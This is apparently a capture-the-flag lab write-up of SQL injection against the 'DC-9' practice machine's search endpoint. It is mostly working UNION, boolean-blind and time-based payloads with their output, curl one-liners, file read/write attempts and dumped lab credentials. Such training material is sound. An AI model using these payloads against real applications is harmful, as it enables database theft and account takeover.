SQL Injection
An SQL injection entry point has been identified in the search function of the target web application on the 192.168.207.209 host.
/Play/DC-9/3-Exploitation/attachments/{BC8DDBA2-8852-49F3-B0D9-5E5329F26F67}.png)
The vulnerable parameter is search when sending a POST request to the /results.php endpoint.
UNION-based In-band
/Play/DC-9/3-Exploitation/attachments/{82AA3C4D-CA89-4688-BC9D-25CE5992D86E}.png)
1' UNION SELECT 1,2,3,4,5,6 -- -A total of 6 columns present and all of them are reflected.
/Play/DC-9/3-Exploitation/attachments/{C1B01054-9112-4E3B-A627-58106605B981}.png)
1' UNION SELECT 1,2,3,user(),database(),version() -- -- The current user is
dbuser@localhost - The current database is
Staff - The backend DB version is
10.3.17-MariaDB-0+deb10u1
Databases (UNION-based In-band)
/Play/DC-9/3-Exploitation/attachments/{88849D79-79F1-4F88-97E1-AE7A3500C6CC}.png)
1' UNION SELECT 1,2,3,4,5,GROUP_CONCAT(schema_name) FROM information_schema.schemata -- -A total of 3 databases available;
information_schemaStaffusers
Staff DB (UNION-based In-band)
/Play/DC-9/3-Exploitation/attachments/{6909D8B1-9595-4A82-8F65-1D6E898F5969}.png)
1' UNION SELECT 1,2,3,4,5,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema="Staff" -- -A total of 2 tables present at the Staff DB;
StaffDetailsUsers
Staff.StaffDetails Table (UNION-based In-band)
/Play/DC-9/3-Exploitation/attachments/{C1182CDD-C67F-49F7-BCED-8DF357B28329}.png)
1' UNION SELECT 1,2,3,4,5,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_schema="Staff" AND table_name="StaffDetails" -- -A total of 7 columns within the Staff.StaffDetails table
This table is fully exposed at the /display.php endpoint.
Staff.Users Table (UNION-based In-band)
/Play/DC-9/3-Exploitation/attachments/{670A860E-5C69-4CDA-A377-DD3AD40F9A0A}.png)
1' UNION SELECT 1,2,3,4,5,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_schema="Staff" AND table_name="Users" -- -A total of 3 columns within the Staff.Users table;
UserIDUsernamePassword
Staff.Users Exfiltration (UNION-based In-band)
/Play/DC-9/3-Exploitation/attachments/{D08D07FC-80D4-4B14-BED8-CC2A9AAECBEE}.png)
1' UNION SELECT 1,2,3,4,5,GROUP_CONCAT(Username,":",Password) FROM Staff.Users -- -Credential exfiltrated; admin:856f5de590ef37314e7c3bdf6f8a66dc
Password Cracking
/Play/DC-9/3-Exploitation/attachments/{DE1ABAF0-7463-425A-AF78-274561853923}.png)
Password hash cracked at crackstation.net; transorbital1
admin:transorbital1
Validating the credential against the /manage.php endpoint.
users DB (UNION-based In-band)
/Play/DC-9/3-Exploitation/attachments/{84A241F6-899F-4566-AAA9-923BEEEBD520}.png)
1' UNION SELECT 1,2,3,4,5,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema="users" -- -A single table exists within the users DB; UserDetails
users.UserDetails Table (UNION-based In-band)
/Play/DC-9/3-Exploitation/attachments/{74AB44B4-2025-4A8E-9EE1-2C247B9701BC}.png)
1' UNION SELECT 1,2,3,4,5,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_schema="users" AND table_name="UserDetails" -- -A total of 6 columns exists at the users.UserDetails table;
idfirstnamelastnameusernamepasswordreg_date
users.UserDetails Exfiltration (UNION-based In-band)
/Play/DC-9/3-Exploitation/attachments/{9280582A-DAB7-46D3-A3A2-9113DFD9E641}.png)
1' UNION SELECT 1,2,3,4,5,GROUP_CONCAT(username,":",password) FROM users.UserDetails -- -A total of 17 credentials exfiltrated;
marym:3kfs86sfdjulied:468sfdfsd2fredf:4sfd87sfd1barneyr:RocksOfftomc:TC&TheBoyzjerrym:B8m#48sdwilmaf:Pebblesbettyr:BamBam01chandlerb:UrAG0D!joeyt:Passw0rdrachelg:yN72#dsdrossg:ILoveRachelmonicag:3248dsds7sphoebeb:smellycatsscoots:YR3BVxxxw87janitor:Ilovepeepeejanitor2:Hawaii-Five-0
Validating against the target SSH server.
File Write (UNION-based In-band)
Web root directory in the host filesystem has not been identified.
/Play/DC-9/3-Exploitation/attachments/{2F9E1FC4-A81D-4416-852D-73A7011A9C59}.png)
1' UNION SELECT 1,2,3,4,5,"test123" INTO OUTFILE "/tmp/test.txt" -- -Blind write. Attempt to confirm it via file read below.
File Read (UNION-based In-band)
/Play/DC-9/3-Exploitation/attachments/{82062C63-E1C7-47BE-A1F1-C0849312249A}.png)
1' UNION SELECT 1,2,3,4,5,LOAD_FILE("/tmp/test.txt") -- -Failed
/Play/DC-9/3-Exploitation/attachments/{4C6AAA13-B216-4446-AFDF-BF3F494DACB7}.png)
1' UNION SELECT 1,2,3,4,5,LOAD_FILE("/etc/passwd") -- -Failed to read /etc/passwd.
This is likely due to lack of permissions
Boolean-based Blind
/Play/DC-9/3-Exploitation/attachments/{12A9E075-5CFE-475C-AD38-D51CB2180F65}.png)
1' OR (SELECT COUNT(*) FROM DUAL WHERE user()='dbuser@localhost') -- -Using count function.
dual dummy table for a placeholder.
The current user is dbuser@localhost.
/Play/DC-9/3-Exploitation/attachments/{1EEF4059-B568-4C7F-A4C4-97881A1E29A9}.png)
1' OR EXISTS(SELECT 1 FROM dual WHERE database()="Staff") -- -Using exists function.
dual dummy table for a placeholder.
The current DB is Staff.
/Play/DC-9/3-Exploitation/attachments/{1B398EF6-7853-4E9A-AD7F-DB6471998F33}.png)
1' OR EXISTS(SELECT 1 FROM dual WHERE version() LIKE "10.3.17-mariadb-0%") -- -Using exists function.
dual dummy table for a placeholder.
Cannot enumerate further as + sign is being interpreted as part of URL encoding.
Databases (Boolean-based Blind)
/Play/DC-9/3-Exploitation/attachments/{FBB22085-059C-41E6-BBA1-052AE5C1D109}.png)
1' OR (SELECT COUNT(schema_name) FROM information_schema.schemata)=3 -- -Using count function, there are a total of 3 databases
/Play/DC-9/3-Exploitation/attachments/{8C971D14-69E8-4F28-ACF0-A6FCF77F78A9}.png)
1' OR EXISTS(SELECT 1 FROM information_schema.schemata WHERE schema_name="information_schema") -- -information_schema DB
/Play/DC-9/3-Exploitation/attachments/{EF0FD6CD-3622-490F-AD79-EE160D982BC1}.png)
1' OR EXISTS(SELECT 1 FROM information_schema.schemata WHERE schema_name="Staff") -- -Staff DB
/Play/DC-9/3-Exploitation/attachments/{566B4F7F-A920-4E52-AEF9-A1B8B2958EB8}.png)
1' OR EXISTS(SELECT 1 FROM information_schema.schemata WHERE schema_name="users") -- -users DB
Staff DB (Boolean-based Blind)
/Play/DC-9/3-Exploitation/attachments/{2689E479-7E18-46D7-9AAE-D46CBEFD573D}.png)
1' OR (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema="Staff")=2 -- -A total of 2 tables within the Staff DB
/Play/DC-9/3-Exploitation/attachments/{511EB9F0-EF98-45E9-94E7-E29DE49C392E}.png)
1' OR EXISTS(SELECT 1 FROM information_schema.tables WHERE table_schema="Staff" AND table_name="StaffDetails") -- -Staff.StaffDetails Table
/Play/DC-9/3-Exploitation/attachments/{1D2BFD31-5024-4682-846B-8F4CAB46D61A}.png)
1' OR EXISTS(SELECT 1 FROM information_schema.tables WHERE table_schema="Staff" AND table_name="Users") -- -Staff.Users Table
Staff.StaffDetails Table (Boolean-based Blind)
/Play/DC-9/3-Exploitation/attachments/{93A70CA3-1EEC-4911-B5D6-AD8B296CEACA}.png)
1' OR (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema="Staff" AND table_name="StaffDetails")=7 -- -A total of 7 columns present at the Staff.StaffDetails table.
This table is fully exposed at the /display.php endpoint.
Staff.Users Table (Boolean-based Blind)
/Play/DC-9/3-Exploitation/attachments/{D10D35C6-D5B8-4EED-B7CA-E6E066570E8D}.png)
1' OR (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema="Staff" AND table_name="Users")=3 -- -A total of 3 columns present at the Staff.Users table.
/Play/DC-9/3-Exploitation/attachments/{E2E2E2C6-A7C3-4B91-B683-CBCF5FB6B337}.png)
1' OR EXISTS(SELECT 1 FROM information_schema.columns WHERE table_schema="Staff" AND table_name="Users" AND column_name="Username") -- -Staff.Users.Username column.
/Play/DC-9/3-Exploitation/attachments/{3AC4C9F3-C33A-443D-BA67-9BC9E6EAA59A}.png)
1' OR EXISTS(SELECT 1 FROM information_schema.columns WHERE table_schema="Staff" AND table_name="Users" AND column_name="Password") -- -Staff.Users.Password column.
Staff.Users Exfiltration (Boolean-based Blind)
/Play/DC-9/3-Exploitation/attachments/{28494AD4-CF51-4A4E-8522-700526FA04C6}.png)
1' OR EXISTS(SELECT 1 FROM Staff.Users WHERE Username="admin") -- -admin user
/Play/DC-9/3-Exploitation/attachments/{78A9F68F-C74C-4F00-BB8B-BDC1CA56E462}.png)
1' OR EXISTS(SELECT 1 FROM Staff.Users WHERE Username="admin" AND Password LIKE "856f5de590ef3731%") -- -/Play/DC-9/3-Exploitation/attachments/{F9C89C24-FD9F-4CF1-8C03-B7F86235CC14}.png)
1' OR EXISTS(SELECT 1 FROM Staff.Users WHERE Username="admin" AND Password="856f5de590ef37314e7c3bdf6f8a66dc") -- -856f5de590ef37314e7c3bdf6f8a66dc is the password hash
Password hash cracked
users DB (Boolean-based Blind)
/Play/DC-9/3-Exploitation/attachments/{74B945DC-5B35-46B8-92C6-FF06C68EB034}.png)
1' OR (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema="users")=1 -- -A single table exists within the users DB
/Play/DC-9/3-Exploitation/attachments/{F42AB354-668A-4026-8116-FA2922E51576}.png)
1' OR EXISTS(SELECT 1 FROM information_schema.tables WHERE table_schema="users" AND table_name="UserDetails") -- -users.UserDetails Table
users.UserDetails Table (Boolean-based Blind)
/Play/DC-9/3-Exploitation/attachments/{16583689-66C4-4290-AF15-F54854284745}.png)
A total of 6 columns exists at the users.UserDetails table
/Play/DC-9/3-Exploitation/attachments/{3B22E947-3051-45F8-8C7E-2A3053E3607D}.png)
1' OR EXISTS(SELECT 1 FROM information_schema.columns WHERE table_schema="users" AND table_name="UserDetails" AND column_name="username") -- -users.UserDetails.username column.
/Play/DC-9/3-Exploitation/attachments/{2E46F67A-C685-4F94-A0CC-24858B536BBB}.png)
1' OR EXISTS(SELECT 1 FROM information_schema.columns WHERE table_schema="users" AND table_name="UserDetails" AND column_name="password") -- -users.UserDetails.password column.
users.UserDetails Exfiltration (Boolean-based Blind)
/Play/DC-9/3-Exploitation/attachments/{144A3BF5-B7A3-4FF3-9D70-301C7C1BF81B}.png)
1' OR EXISTS(SELECT 1 FROM users.UserDetails WHERE username LIKE "jani%") -- -/Play/DC-9/3-Exploitation/attachments/{020E4411-3370-494D-87B2-BEEE4CDE5F15}.png)
1' OR EXISTS(SELECT 1 FROM users.UserDetails WHERE username="janitor") -- -janitor user.
/Play/DC-9/3-Exploitation/attachments/{4BD6ADF2-02A2-4EF3-8E5A-C9187EBCECD8}.png)
1' OR EXISTS(SELECT 1 FROM users.UserDetails WHERE username="janitor" AND password LIKE "Ilo%") -- -
/Play/DC-9/3-Exploitation/attachments/{FE262450-D08C-46ED-8B36-DA0FD098355A}.png)
1' OR EXISTS(SELECT 1 FROM users.UserDetails WHERE username="janitor" AND password="Ilovepeepee") -- -Ilovepeepee is the password of the janitor user.
A total of 17 credentials exists above.
Time-based Blind
If boolean-based attack works, time-based attack INHERENTLY works.
Just need to wrap up the boolean-based SQLi payload with IF() and SLEEP()
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF((SELECT COUNT(*) FROM DUAL WHERE database()="Staff"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.06s
user 0.01s
sys 0.00s
cpu 0%This works but it took 17 seconds because the injected SQL is evaluated(executed) per-row, and there are 17 rows, resulting in taking 17 seconds.
The current DB is Staff
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF((SELECT COUNT(*) FROM DUAL WHERE user()="dbuser@localhost" LIMIT 1), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.47s
user 0.01s
sys 0.00s
cpu 0%The current user is dbuser@localhost
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM dual WHERE version() LIKE "10.3.17-mariadb-0%"), SLEEP(1), 0) -- --- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.47s
user 0.01s
sys 0.00s
cpu 0%Databases (Time-based Blind)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF((SELECT COUNT(schema_name) FROM information_schema.schemata)=3, SLEEP(1), 0) -- --- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.47s
user 0.01s
sys 0.00s
cpu 0%3 DBs
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM information_schema.schemata WHERE schema_name="information_schema"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%information_schema DB
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM information_schema.schemata WHERE schema_name="Staff"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%Staff DB
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM information_schema.schemata WHERE schema_name="users"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%users DB
Staff DB (Time-based Blind)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF((SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema="Staff")=2, SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%2 Tables
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM information_schema.tables WHERE table_schema="Staff" AND table_name="StaffDetails"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%Staff.StaffDetails Table
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM information_schema.tables WHERE table_schema="Staff" AND table_name="Users"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%Staff.Users Table
Staff.StaffDetails Table (Time-based Blind)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF((SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema="Staff" AND table_name="StaffDetails")=7, SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%7 columns at the Staff.StaffDetails table
This table is fully exposed at the /display.php endpoint.
Staff.Users Table (Time-based Blind)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF((SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema="Staff" AND table_name="Users")=3, SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%3 columns at the Staff.Users table
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM information_schema.columns WHERE table_schema="Staff" AND table_name="Users" AND column_name="Username"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%Staff.Users.Username column
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM information_schema.columns WHERE table_schema="Staff" AND table_name="Users" AND column_name="Password"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%Staff.Users.Password column
Staff.Users Exfiltration (Time-based Blind)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM Staff.Users WHERE Username="admin"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%admin user
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM Staff.Users WHERE Username="admin" AND Password LIKE "856f5de590ef3731%"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM Staff.Users WHERE Username="admin" AND Password="856f5de590ef37314e7c3bdf6f8a66dc"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%856f5de590ef37314e7c3bdf6f8a66dc is the password hash of the admin user.
Password hash cracked.
users DB (Time-based Blind)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF((SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema="users")=1, SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%Only 1 table
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM information_schema.tables WHERE table_schema="users" AND table_name="UserDetails"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%users.UserDetails Table
users.UserDetails Table (Time-based Blind)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF((SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema="users" AND table_name="UserDetails")=6, SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%6 columns at users.UserDetails table
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM information_schema.columns WHERE table_schema="users" AND table_name="UserDetails" AND column_name="username"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%users.UserDetails.username column
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM information_schema.columns WHERE table_schema="users" AND table_name="UserDetails" AND column_name="password"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%users.UserDetails.password column
users.UserDetails Exfiltration (Time-based Blind)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM users.UserDetails WHERE username LIKE "jani%"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM users.UserDetails WHERE username="janitor"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%janitor user.
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM users.UserDetails WHERE username="janitor" AND password LIKE "Ilovepee%"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM users.UserDetails WHERE username="janitor" AND password="Ilovepeepee"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%Ilovepeepee is the password of the janitor user.
A total of 17 credentials exists above.